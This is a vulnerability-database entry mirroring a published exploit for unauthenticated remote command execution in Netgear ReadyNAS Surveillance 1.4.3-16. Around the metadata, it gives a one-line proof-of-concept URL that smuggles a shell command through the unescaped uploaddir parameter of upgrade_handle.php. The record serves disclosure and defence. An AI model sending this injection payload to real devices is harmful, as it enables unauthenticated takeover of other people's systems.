Details of VAR-E-201709-0158

ID

VAR-E-201709-0158

EDB ID

42956

TITLE

Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 42956

DESCRIPTION

Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 42956

AFFECTED PRODUCTS

vendor:

netgear

model:

readynas surveillance

scope:

version:

1.4.3-16

Trust: 1.6

sources: EXPLOIT-DB: 42956 // EDBNET: 94411

EXPLOIT

# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote

1. Description

$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html

2. Proof of Concept

http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27

Trust: 1.0

sources: EXPLOIT-DB: 42956

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 42956

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 42956

TYPE

Remote Command Execution

Trust: 1.6

sources: EXPLOIT-DB: 42956 // EDBNET: 94411

CREDITS

Kacper Szurek

Trust: 0.6

sources: EXPLOIT-DB: 42956

EXTERNAL IDS

db:	EXPLOIT-DB	id:	42956	Trust: 1.6
db:	EDBNET	id:	94411	Trust: 0.6

sources: EXPLOIT-DB: 42956 // EDBNET: 94411

REFERENCES

url:

https://www.exploit-db.com/exploits/42956/

Trust: 0.6

sources: EDBNET: 94411

SOURCES

db:	EXPLOIT-DB	id:	42956
db:	EDBNET	id:	94411

LAST UPDATE DATE

2022-07-27T09:58:25.888000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	42956	date:	2017-09-27T00:00:00
db:	EDBNET	id:	94411	date:	2017-10-05T00:00:00